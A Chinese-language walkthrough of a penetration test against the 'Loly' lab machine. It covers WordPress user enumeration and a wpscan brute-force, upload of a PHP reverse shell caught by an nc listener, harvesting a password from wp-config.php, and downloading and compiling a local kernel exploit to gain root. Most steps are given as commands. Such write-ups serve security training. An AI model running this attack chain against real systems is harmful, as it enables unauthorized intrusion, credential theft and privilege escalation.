Loly 靶机渗透
Loly 靶机渗透
Loly 靶机
,修改主机网络模式为 NAT
1.确定主机 ip
arp-scan -l
2.信息收集
主机、端口、服务版本扫描
扫描结果
端口 | 信息 |
---|---|
80/tcp | Nginx 1.10.3((Ubuntu)) |
80 端口网站
就一个页面,其他都点不开 查看源码,没发现什么
网站目录扫描
dirb http://192.168.220.203/
发现 Wordpress 系统,访问网站,http://192.168.220.203/wordpress/
点击“Sample Page”会发现跳转了以下链接
页面无法显示,说明需要本地添加域名 Hosts 执行命令:mousepad /etc/hosts
192.168.220.203 loly.lc
重新访问链接:
http://loly.lc/wordpress/?page_id=2
正常显示
根据前面目录扫描,访问后台
但是不知道的账户和密码,尝试弱口令:admin/admin
账户不多
3. 威胁建模与漏洞分析
使用 wordpress 专用扫描器扫描网站
使用 wpscan 扫描网站,枚举用户名
wpscan --url=http://loly.lc/wordpress/ -e u
获取到用户名:loly
使用 wpscan 破解网站密码:
wpscan --url=http://loly.lc/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
获取到密码:fernando
账户密码:loly/fernando
登陆后台:http://loly.lc/wordpress/wp-login.php
发现需要验证邮箱,直接跳过,进入后台
4.漏洞利用
利用后台文件上传漏洞获取 shell
寻找后台上传可上传的点,可以发现有一个可以上传的点,支持 zip 文件
将后门文件打包,然后尝试上传
提示已经上传,有一个可以得到文件的目录/banners 但是依然不知道准确的路径,再次查看页面,找到了一个完整的路径
尝试访问:[http://loly.lc/wordpress/wp-content/banners/test.php](http://loly.lc/wordpress/wp-content/banners/test.php)
成功访问
将 kali 中的后门文件复制到当前目录,然后修改文件中的 IP
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.ph
使用 ifconfig
查看本机 IP,一般是网卡 eth0 显示的 IP,然后修改文件
重新打包后门,上传文件,然后访问 尝试访问:
[http://loly.lc/wordpress/wp-content/banners/shell.php](http://loly.lc/wordpress/wp-content/banners/shell.php)
只要显示上面字符串说明文件正常 在 kali 中开启监听:
nc -lvp 1234
然后访问 shell 文件
反弹 shell 成功,使用 python 切换为交互式
shell bash python3 -c 'import pty;pty.spawn("/bin/bash")'
查看用户文件:cat /etc/passwd
有一个账户和网站用户名一致,尝试切换账户:su loly
失败
5.权限提升
利用漏洞本地提权失败
查看系统版本和内核版本信息 uname -a lsb_release -a
使用 searchsploit 搜索漏洞:searchsploit ubuntu 16.04
可以发现有很多,寻找一个
拷贝 37292.c
文件到自己的目录,开启 http 服务器
searchsploit -m 45010
python2 -m SimpleHTTPServer 80
在靶机服务器中下载文件,一般切换到/tmp
目录下操作
查看文件获取编译运行命令:
退出查看用命令 q,
然后回车 进行编译:gcc 45010.c -o pwn
编译失败,可能是当前 shell 缺一些库,毕竟是网站 shell,有些库可能没有加载。
信息收集获取用户 shell 再提权成功
网站目录一般在/var/www/html
查看网站目录配置文件:/var/www/html/wordpress/wp-config.php
可以发现一个密码:lolyisabeautifulgirl
再次尝试切换用户名 loly:su loly
成功切换 再次切换到/tmp 目录,尝试编译:gcc 45010.c -o pwn
编译成功,运行程序:./pwn
成功反弹 shell
小结
本节使用了以下工具: arp-scan,nmap,dirb,wpscan,gcc
本节涉及的漏洞:
暴力破解 文件上传 本地提权漏洞
领悟小结:
WebShell
无论是从权限还是支持的程序来看都不够好,还是需要获取用户 shell
或者 root shell
。